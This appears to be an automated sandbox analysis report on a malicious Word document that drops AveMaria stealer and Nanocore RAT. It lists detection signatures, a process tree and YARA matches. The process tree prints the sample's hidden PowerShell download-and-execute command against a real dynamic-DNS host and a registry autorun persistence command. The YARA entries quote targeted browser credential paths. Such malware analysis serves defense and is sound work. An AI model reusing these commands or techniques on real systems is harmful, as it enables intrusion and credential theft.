Play interactive tour

Edit tour

Windows Analysis Report N40-MR 311.doc

Overview

General Information

Sample Name:	N40-MR 311.doc
Analysis ID:	457806
MD5:	0284c94401a743d97b9cca52ac790864
SHA1:	fc3a473b80e9f717a68c54374aadc016cfe0d9ed
SHA256:	433fef750a44d6d44ebc9acf291ae3ad5812531d8aba3bdf543d44dcff943694
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

AveMaria Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Powershell download and execute file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AveMaria stealer

Yara detected Nanocore RAT

.NET source code contains potential unpacker

Allocates memory in foreign processes

Bypasses PowerShell execution policy

Contains functionality to hide user accounts

Contains functionality to inject threads in other processes

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal e-mail passwords

Creates a thread in another existing process (thread injection)

Creates an undocumented autostart registry key

Document exploit detected (process start blacklist hit)

Found suspicious RTF objects

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides user accounts

Increases the number of concurrent connection per server for Internet Explorer

Injects a PE file into a foreign processes

Injects files into Windows application

Installs a global keyboard hook

Machine Learning detection for dropped file

Microsoft Office creates scripting files

Office process drops PE file

Powershell drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: PowerShell DownloadFile

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to download and execute files (via powershell)

Uses dynamic DNS services

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to create new users

Contains functionality to detect virtual machines (SLDT)

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Exploit for CVE-2017-0261

Sigma detected: PowerShell Download from URL

Sigma detected: Verclsid.exe Runs COM Object

Spawns drivers

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2640 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

powershell.exe (PID: 2776 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

microA.exe (PID: 2508 cmdline: 'C:\Users\user\AppData\Roaming\microA.exe' MD5: 100C3E2649FD32CE6D7E108E1A2EBF0D)

microA.exe (PID: 2532 cmdline: C:\Users\user\AppData\Local\Temp\microA.exe MD5: 100C3E2649FD32CE6D7E108E1A2EBF0D)

cmd.exe (PID: 2648 cmdline: cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

reg.exe (PID: 2244 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe' MD5: D69A9ABBB0D795F21995C2F48C1EB560)

images.exe (PID: 1616 cmdline: C:\ProgramData\images.exe MD5: 100C3E2649FD32CE6D7E108E1A2EBF0D)

images.exe (PID: 1468 cmdline: C:\Users\user\AppData\Local\Temp\images.exe MD5: 100C3E2649FD32CE6D7E108E1A2EBF0D)

images.exe (PID: 1312 cmdline: C:\Users\user\AppData\Local\Temp\images.exe MD5: 100C3E2649FD32CE6D7E108E1A2EBF0D)

images.exe (PID: 2168 cmdline: C:\Users\user\AppData\Local\Temp\images.exe MD5: 100C3E2649FD32CE6D7E108E1A2EBF0D)

cmd.exe (PID: 2248 cmdline: C:\Windows\System32\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)

JhwfHBtD..exe (PID: 2988 cmdline: 'C:\Users\user\AppData\Roaming\JhwfHBtD..exe' MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)

JhwfHBtD..exe (PID: 504 cmdline: C:\Users\user\AppData\Roaming\JhwfHBtD..exe MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)

FLTLDR.EXE (PID: 2532 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT MD5: AF5CCD95BAC7ADADD56DE185D7461B2C)

powershell.exe (PID: 1980 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

microA.exe (PID: 972 cmdline: 'C:\Users\user\AppData\Roaming\microA.exe' MD5: 100C3E2649FD32CE6D7E108E1A2EBF0D)

microA.exe (PID: 2372 cmdline: C:\Users\user\AppData\Local\Temp\microA.exe MD5: 100C3E2649FD32CE6D7E108E1A2EBF0D)

powershell.exe (PID: 2256 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

microA.exe (PID: 1960 cmdline: 'C:\Users\user\AppData\Roaming\microA.exe' MD5: 100C3E2649FD32CE6D7E108E1A2EBF0D)

microA.exe (PID: 2644 cmdline: C:\Users\user\AppData\Local\Temp\microA.exe MD5: 100C3E2649FD32CE6D7E108E1A2EBF0D)

verclsid.exe (PID: 1948 cmdline: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)

notepad.exe (PID: 2032 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT' MD5: B32189BDFF6E577A92BAA61AD49264E6)

drvinst.exe (PID: 1620 cmdline: DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '00000000000005F4' '00000000000005E4' MD5: 2DBA1472BDF847EAE358A4B9FA9AB0C1)

rdpdr.sys (PID: 4 cmdline: MD5: 1B6163C503398B23FF8B939C67747683)

tdtcp.sys (PID: 4 cmdline: MD5: 51C5ECEB1CDEE2468A1748BE550CFBC8)

tssecsrv.sys (PID: 4 cmdline: MD5: 19BEDA57F3E0A06B8D5EB6D619BD5624)

RDPWD.SYS (PID: 4 cmdline: MD5: FE571E088C2D83619D2D48D4E961BF41)

smtpsvc.exe (PID: 2040 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000024.00000002.2368647593.00000000024B1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000006.00000002.2100943704.0000000000360000.00000004.00000020.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x328b:$sb1: -W Hidden 0x327b:$sc1: -NoP 0x3285:$sd1: -NonI 0x3295:$se3: -ExecutionPolicy bypass 0x3280:$sf1: -sta
00000024.00000002.2366916666.00000000007D0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
00000024.00000002.2366916666.00000000007D0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
00000024.00000002.2366832596.00000000007B0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
00000024.00000002.2366832596.00000000007B0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18078:$a1: \Opera Software\Opera Stable\Login Data 0x183a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x17ce8:$a3: \Google\Chrome\User Data\Default\Login Data
00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x1a120:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19e74:$str2: MsgBox.exe 0x19d48:$str6: Ave_Maria 0x193e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x18a08:$str8: SMTP Password 0x17ce8:$str11: \Google\Chrome\User Data\Default\Login Data 0x193c0:$str12: \sqlmap.dll
00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18078:$a1: \Opera Software\Opera Stable\Login Data 0x183a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x17ce8:$a3: \Google\Chrome\User Data\Default\Login Data
00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x1a120:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19e74:$str2: MsgBox.exe 0x19d48:$str6: Ave_Maria 0x193e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x18a08:$str8: SMTP Password 0x17ce8:$str11: \Google\Chrome\User Data\Default\Login Data 0x193c0:$str12: \sqlmap.dll
0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000024.00000002.2366678139.0000000000740000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
00000024.00000002.2366678139.0000000000740000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
00000003.00000002.2099841469.0000000000390000.00000004.00000020.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x328b:$sb1: -W Hidden 0x327b:$sc1: -NoP 0x3285:$sd1: -NonI 0x3295:$se3: -ExecutionPolicy bypass 0x3280:$sf1: -sta
00000024.00000002.2366711358.0000000000760000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
00000024.00000002.2366711358.0000000000760000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
00000024.00000002.2367125830.0000000000C30000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
00000024.00000002.2367125830.0000000000C30000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18078:$a1: \Opera Software\Opera Stable\Login Data 0x183a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x17ce8:$a3: \Google\Chrome\User Data\Default\Login Data
00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x1a120:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19e74:$str2: MsgBox.exe 0x19d48:$str6: Ave_Maria 0x193e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x18a08:$str8: SMTP Password 0x17ce8:$str11: \Google\Chrome\User Data\Default\Login Data 0x193c0:$str12: \sqlmap.dll
0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2a85:$a: NanoCore 0x2ade:$a: NanoCore 0x2b1b:$a: NanoCore 0x2b94:$a: NanoCore 0x1623f:$a: NanoCore 0x16254:$a: NanoCore 0x16289:$a: NanoCore 0x2ed2b:$a: NanoCore 0x2ed40:$a: NanoCore 0x2ed75:$a: NanoCore 0xebabf:$a: NanoCore 0xebae4:$a: NanoCore 0xebb3d:$a: NanoCore 0xfbcdc:$a: NanoCore 0xfbd02:$a: NanoCore 0xfbd5e:$a: NanoCore 0x108bb5:$a: NanoCore 0x108c0e:$a: NanoCore 0x108c41:$a: NanoCore 0x108e6d:$a: NanoCore 0x108ee9:$a: NanoCore
00000024.00000002.2366178722.0000000000580000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
00000024.00000002.2366178722.0000000000580000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000024.00000002.2365752847.00000000003C0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000024.00000002.2365752847.00000000003C0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000024.00000002.2368726413.0000000002502000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3012a:$a: NanoCore 0x3014f:$a: NanoCore 0x301a8:$a: NanoCore 0x4038f:$a: NanoCore 0x403b5:$a: NanoCore 0x40411:$a: NanoCore 0x4d2ab:$a: NanoCore 0x4d304:$a: NanoCore 0x4d337:$a: NanoCore 0x4d563:$a: NanoCore 0x4d5df:$a: NanoCore 0x4dbf8:$a: NanoCore 0x4dd41:$a: NanoCore 0x4e215:$a: NanoCore 0x4e4fc:$a: NanoCore 0x4e513:$a: NanoCore 0x573f7:$a: NanoCore 0x57473:$a: NanoCore 0x59d56:$a: NanoCore 0x5f361:$a: NanoCore 0x5f3db:$a: NanoCore
00000024.00000002.2374416119.0000000003777000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x55707:$a: NanoCore 0x557f1:$a: NanoCore 0x56668:$a: NanoCore 0x5f812:$a: NanoCore 0x5f873:$a: NanoCore 0x5f8b6:$a: NanoCore 0x5f8f6:$a: NanoCore 0x5fb32:$a: NanoCore 0x5fbd2:$a: NanoCore 0x603aa:$a: NanoCore 0x6099d:$a: NanoCore 0x60aee:$a: NanoCore 0x61948:$a: NanoCore 0x61baf:$a: NanoCore 0x61bc4:$a: NanoCore 0x61be3:$a: NanoCore 0x6aae6:$a: NanoCore 0x6ab0f:$a: NanoCore 0x76888:$a: NanoCore 0x768b1:$a: NanoCore 0x9b774:$a: NanoCore
00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000A.00000002.2171424499.0000000003369000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 52 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
25.2.images.exe.400000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x16678:$a1: \Opera Software\Opera Stable\Login Data 0x169a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x162e8:$a3: \Google\Chrome\User Data\Default\Login Data
25.2.images.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
25.2.images.exe.400000.1.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
25.2.images.exe.400000.1.unpack	AveMaria_WarZone	unknown	unknown	0x18720:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x18474:$str2: MsgBox.exe 0x18348:$str6: Ave_Maria 0x179e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x17008:$str8: SMTP Password 0x162e8:$str11: \Google\Chrome\User Data\Default\Login Data 0x179c0:$str12: \sqlmap.dll
16.2.microA.exe.400000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18078:$a1: \Opera Software\Opera Stable\Login Data 0x183a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x17ce8:$a3: \Google\Chrome\User Data\Default\Login Data
16.2.microA.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.microA.exe.400000.0.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
16.2.microA.exe.400000.0.raw.unpack	AveMaria_WarZone	unknown	unknown	0x1a120:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19e74:$str2: MsgBox.exe 0x19d48:$str6: Ave_Maria 0x193e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x18a08:$str8: SMTP Password 0x17ce8:$str11: \Google\Chrome\User Data\Default\Login Data 0x193c0:$str12: \sqlmap.dll
10.2.microA.exe.3369c78.12.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
10.2.microA.exe.3369c78.12.unpack	AveMaria_WarZone	unknown	unknown	0x16d20:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x16a74:$str2: MsgBox.exe 0x16948:$str6: Ave_Maria 0x15fe8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15608:$str8: SMTP Password 0x15fc0:$str12: \sqlmap.dll
17.2.microA.exe.400000.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x16678:$a1: \Opera Software\Opera Stable\Login Data 0x169a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x162e8:$a3: \Google\Chrome\User Data\Default\Login Data
17.2.microA.exe.400000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.microA.exe.400000.2.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
17.2.microA.exe.400000.2.unpack	AveMaria_WarZone	unknown	unknown	0x18720:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x18474:$str2: MsgBox.exe 0x18348:$str6: Ave_Maria 0x179e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x17008:$str8: SMTP Password 0x162e8:$str11: \Google\Chrome\User Data\Default\Login Data 0x179c0:$str12: \sqlmap.dll
12.2.microA.exe.32c94f0.12.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.microA.exe.32c94f0.12.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
18.2.microA.exe.400000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18078:$a1: \Opera Software\Opera Stable\Login Data 0x183a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x17ce8:$a3: \Google\Chrome\User Data\Default\Login Data
18.2.microA.exe.400000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
18.2.microA.exe.400000.1.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
18.2.microA.exe.400000.1.raw.unpack	AveMaria_WarZone	unknown	unknown	0x1a120:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19e74:$str2: MsgBox.exe 0x19d48:$str6: Ave_Maria 0x193e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x18a08:$str8: SMTP Password 0x17ce8:$str11: \Google\Chrome\User Data\Default\Login Data 0x193c0:$str12: \sqlmap.dll
11.2.microA.exe.34da100.12.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x16678:$a1: \Opera Software\Opera Stable\Login Data 0x169a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x162e8:$a3: \Google\Chrome\User Data\Default\Login Data
11.2.microA.exe.34da100.12.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.microA.exe.34da100.12.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
11.2.microA.exe.34da100.12.raw.unpack	AveMaria_WarZone	unknown	unknown	0x18720:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x18474:$str2: MsgBox.exe 0x18348:$str6: Ave_Maria 0x179e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x17008:$str8: SMTP Password 0x162e8:$str11: \Google\Chrome\User Data\Default\Login Data 0x179c0:$str12: \sqlmap.dll
